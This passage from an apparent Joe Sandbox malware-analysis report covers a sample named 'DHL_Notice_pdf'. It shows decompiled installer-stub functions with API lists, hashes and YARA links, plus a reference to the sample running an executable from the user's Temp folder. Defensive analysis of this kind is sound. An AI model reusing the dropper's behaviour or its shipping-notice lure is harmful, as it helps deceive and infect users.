				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                            0x004056d0
                                                            0x004056da
                                                            0x004056df
                                                            0x004056e5
                                                            0x004056f0
                                                            0x004056f3
                                                            0x004056f6
                                                            0x004056fc
                                                            0x004056fc
                                                            0x00405702
                                                            0x0040570a
                                                            0x0040570d
                                                            0x0040572a
                                                            0x0040572e
                                                            0x00405737
                                                            0x00405737
                                                            0x00405741
                                                            0x0040574a
                                                            0x00405756
                                                            0x0040575d
                                                            0x00405761
                                                            0x00405764
                                                            0x00405777
                                                            0x00405785
                                                            0x00405785
                                                            0x00405789
                                                            0x0040578b
                                                            0x0040578e
                                                            0x00000000
                                                            0x0040578e
                                                            0x0040570f
                                                            0x00405717
                                                            0x0040571f
                                                            0x00405725
                                                            0x00000000
                                                            0x00405725
                                                            0x0040571f
                                                            0x0040570d
                                                            0x0040579a

                                                            APIs
                                                            • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                            • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                            • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                            • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                            • String ID: ('B
                                                            • API String ID: 1495540970-2332581011
                                                            • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                            • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                            • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                            • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                            0x0040463d
                                                            0x004046f3
                                                            0x00000000
                                                            0x004046f3
                                                            0x0040464e
                                                            0x00404652
                                                            0x00000000
                                                            0x0040466c
                                                            0x0040466c
                                                            0x00404675
                                                            0x00000000
                                                            0x00000000
                                                            0x00404677
                                                            0x00404683
                                                            0x00404686
                                                            0x00404686
                                                            0x0040468c
                                                            0x00404692
                                                            0x00404692
                                                            0x0040469e
                                                            0x004046a4
                                                            0x004046ab
                                                            0x004046ae
                                                            0x004046b1
                                                            0x004046b3
                                                            0x004046b3
                                                            0x004046bb
                                                            0x004046c1
                                                            0x004046c1
                                                            0x004046cb
                                                            0x004046d0
                                                            0x004046d3
                                                            0x004046d8
                                                            0x004046db
                                                            0x004046db
                                                            0x004046eb
                                                            0x004046eb
                                                            0x00000000
                                                            0x004046ee

                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                            • GetSysColor.USER32(00000000), ref: 00404686
                                                            • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                            • SetBkMode.GDI32(?,?), ref: 0040469E
                                                            • GetSysColor.USER32(?), ref: 004046B1
                                                            • SetBkColor.GDI32(?,?), ref: 004046C1
                                                            • DeleteObject.GDI32(?), ref: 004046DB
                                                            • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                            • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                            • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                            0x004026ec
                                                            0x004026ee
                                                            0x004026f1
                                                            0x004026f3
                                                            0x004026f6
                                                            0x004026fb
                                                            0x004026ff
                                                            0x00402702
                                                            0x00402705
                                                            0x00402c2a
                                                            0x00402c2d
                                                            0x0040270b
                                                            0x0040270b
                                                            0x00402712
                                                            0x00402714
                                                            0x00402714
                                                            0x0040271a
                                                            0x0040287e
                                                            0x0040287e
                                                            0x00402881
                                                            0x00402886
                                                            0x004015b6
                                                            0x0040292e
                                                            0x0040292e
                                                            0x00000000
                                                            0x00402720
                                                            0x00402721
                                                            0x0040272c
                                                            0x0040272f
                                                            0x0040273b
                                                            0x0040273f
                                                            0x004027d7
                                                            0x004027ef
                                                            0x004027ff
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402745
                                                            0x00402745
                                                            0x00402748
                                                            0x00402749
                                                            0x0040274c
                                                            0x00402751
                                                            0x00402758
                                                            0x00402760
                                                            0x00000000
                                                            0x00402766
                                                            0x00402766
                                                            0x0040276b
                                                            0x00000000
                                                            0x00402771
                                                            0x00402771
                                                            0x00402779
                                                            0x0040277c
                                                            0x0040277f
                                                            0x0040283a
                                                            0x00402841
                                                            0x00402785
                                                            0x0040278b
                                                            0x00402797
                                                            0x00402801
                                                            0x00402801
                                                            0x00402799
                                                            0x00402799
                                                            0x0040279c
                                                            0x0040279e
                                                            0x0040279e
                                                            0x0040279e
                                                            0x004027a1
                                                            0x004027a6
                                                            0x004027a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004027ab
                                                            0x004027ae
                                                            0x004027bc
                                                            0x004027c2
                                                            0x004027d0
                                                            0x00000000
                                                            0x004027d2
                                                            0x00000000
                                                            0x004027d2
                                                            0x00000000
                                                            0x004027d0
                                                            0x0040279e
                                                            0x00402804
                                                            0x00402807
                                                            0x00000000
                                                            0x00402809
                                                            0x0040280e
                                                            0x0040284f
                                                            0x00402871
                                                            0x00402878
                                                            0x0040285d
                                                            0x0040285d
                                                            0x00402860
                                                            0x00402863
                                                            0x00402866
                                                            0x00402866
                                                            0x00000000
                                                            0x00402817
                                                            0x00402817
                                                            0x0040281a
                                                            0x0040281d
                                                            0x00402823
                                                            0x00402827
                                                            0x0040282a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040282a
                                                            0x0040280e
                                                            0x00402807
                                                            0x0040277f
                                                            0x0040276b
                                                            0x00402760
                                                            0x00000000
                                                            0x0040282c
                                                            0x0040282c
                                                            0x0040282f
                                                            0x00402838
                                                            0x00000000
                                                            0x0040272f
                                                            0x0040271a
                                                            0x00402c33
                                                            0x00402c39

                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                              • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                            • String ID: 9
                                                            • API String ID: 163830602-2366072709
                                                            • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                            • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                            • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                            • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                            0x004068f1
                                                            0x004068fa
                                                            0x00406911
                                                            0x00406911
                                                            0x00406918
                                                            0x00406924
                                                            0x00406924
                                                            0x00406927
                                                            0x0040692a
                                                            0x0040692f
                                                            0x00406931
                                                            0x0040693a
                                                            0x0040693e
                                                            0x0040695b
                                                            0x00406963
                                                            0x00406963
                                                            0x00406968
                                                            0x0040696a
                                                            0x0040696d
                                                            0x00406972
                                                            0x00406973
                                                            0x00406977
                                                            0x00406977
                                                            0x00406978
                                                            0x0040697f
                                                            0x00406981
                                                            0x00406988
                                                            0x00000000
                                                            0x00000000
                                                            0x00406990
                                                            0x00406996
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406996
                                                            0x0040699b

                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                            • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                            • CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                            • CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-2982765560
                                                            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                            • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                            • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                            0x0040303d
                                                            0x0040303f
                                                            0x00403046
                                                            0x00403049
                                                            0x00403049
                                                            0x0040304f
                                                            0x00000000
                                                            0x0040304f
                                                            0x0040305d
                                                            0x00000000
                                                            0x00403060
                                                            0x00403067
                                                            0x00403073
                                                            0x0040307b
                                                            0x004030b9
                                                            0x004030c2
                                                            0x00000000
                                                            0x004030c7
                                                            0x00403084
                                                            0x00403095
                                                            0x00000000
                                                            0x004030a3
                                                            0x00403084
                                                            0x004030cf

                                                            APIs
                                                            • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                            • GetTickCount.KERNEL32 ref: 00403067
                                                            • wsprintfW.USER32 ref: 00403095
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                            • CreateDialogParamW.USER32 ref: 004030B9
                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                              • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                            • String ID: ... %d%%
                                                            • API String ID: 722711167-2449383134
                                                            • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                            • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                            • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                            • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














